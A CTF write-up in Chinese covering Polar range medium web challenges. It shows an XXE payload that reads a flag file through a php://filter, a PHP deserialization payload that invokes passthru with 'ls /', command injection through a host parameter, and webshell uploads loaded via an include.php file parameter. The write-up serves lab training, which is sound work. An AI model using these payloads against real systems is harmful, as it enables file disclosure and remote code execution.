当前位置: 首页 > news >正文

Polar靶场-Web中等题目记录(15-32)

ExX?

根据题目,发现存在phpinfo,搜索发现flag

image

很遗憾,flag错误,是假的

没有什么思路,扫描网站目录,发现存在dom.php

image

查看提示,存在xxe漏洞

image

尝试构造利用,读取flag

payload:

<!DOCTYPE root [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flagggg.php" >
]><root><username>&xxe;</username><password>root</password>
</root>

image

image

EZ_Host

查看题目提示,存在?host=YOUR_HOST可执行参数

image

构造命令执行语句

image

读取flag

image

传马

查看题目,上传一句话木马

image

连接获取webshell,使用命令行读取flag

image

笑傲上传

老规矩,上传文件测试

image

监测存在过滤(监测文件内容),尝试上传图片马绕过

image

发现无法连接,查看网站源代码发现include.php

image

尝试使用file参数读取上传一句话木马进行加载

image

image

连接获取flag

image

序列一下

查看题目,反序列化题目

image

构造payload

<?php
class Polar {public $url = 'polarctf.com';public $lt  = 'passthru';public $b   = 'ls /';
}
echo serialize(new Polar);
?>

image

获取flag

image

坏掉的上传页

查看题目,发现上传无法进行

image

找到config.php

image

访问查看,发现默认上传路径

image

构造上传脚本

image

可以正常上传,连接获取flag

image

xxmmll

image

抓包发现提示xxmmll.php

image

读取flag

image

根据报错提示,输入xml语句,成功回显flag

<?xml version="1.0" encoding="UTF-8"?>
<xxe><Message>123123</Message>
</xxe>

image

这个题目有偷鸡的方法,可以扫目录,能直接查看到flag

image

Note

根据提示,查看debug.log

image

没有任何思路,看提示应该是反序列,可以通过logs.txt查看提示,但是不太会

选择偷鸡,访问flag.txt

image

http://www.jsqmd.com/news/88097/

相关文章:

  • Citra模拟器终极指南:5分钟上手玩转3DS游戏
  • 基于SpringBoot的职工健康监护管理系统-计算机毕业设计源码+LW文档
  • STM32学习_GPIO简介
  • 数据结构期末复习:递归与循环核心算法实战总结
  • GDevelop游戏引擎终极指南:从零基础到专业开发全流程
  • 【机械臂】基于 RRT 算法在3D 机械臂(主轴)路径规划中的工程实现,在含固定障碍物(副轴、外壳)的约束环境中,找到从起点构型到目标构型的无碰撞路径附matlab代码
  • 从产线到质检,兰亭妙微教你做 “工人愿意用” 的工业 UI
  • Flutter + OpenHarmony 安全开发指南:构建可信、合规、防逆向的鸿蒙应用
  • Windows系统sc命令:系统安全防护的实用工具
  • 洛雪音乐音源:3分钟快速部署全网音乐资源的终极方案
  • 告别调度繁琐:北京兰亭妙微拆解货运 APP 的 “轻量高效设计密码”
  • 网易云音乐无损下载:命令行工具完美备份你的音乐收藏
  • 基于SpringBoot的智慧药店药品信息管理系统-计算机毕业设计源码+LW文档
  • 2025年度小红书代运营机构综合实力排行出炉,短视频获客/抖音代运营/短视频运营公司/小红书代运营/短视频代运营小红书代运营服务商推荐排行榜 - 品牌推荐师
  • 长尾关键词对SEO的重要性及其优化策略总结
  • 智能时代下SEO关键词优化的全新视角与实用策略
  • 终极日语学习方案:Memento播放器如何让看剧效率翻倍300%
  • 怎么在idea去掉在微信公众号粘贴的nbsp
  • DOSBOX的区别简要
  • AI元人文构想:度量衡与悟空来路——一次术语修订的理论意义
  • OceanBase 常见异情况汇总 - 详解
  • 基于SpringBoot的智慧医疗问诊系统-计算机毕业设计源码+LW文档
  • 2025.12.14——1黄
  • Doxygen
  • Cryptlib
  • 教编神器,太逆天了
  • SVN版本号
  • JOTO(聚托科技)作为 Dify 企业版服务商,如何助力企业构建高效 AI 应用
  • 智能婴儿床,睡眠监测+安抚提醒,核心功能,压力传感器检测婴儿睡眠,如是否哭闹,是否翻身,APP推送提醒,哭闹时自动播放舒缓音乐,轻微摇晃,帮婴儿入睡,应用场景,新爸妈照顾婴儿,关注睡眠,减轻照顾压力
  • 音效神器,绝了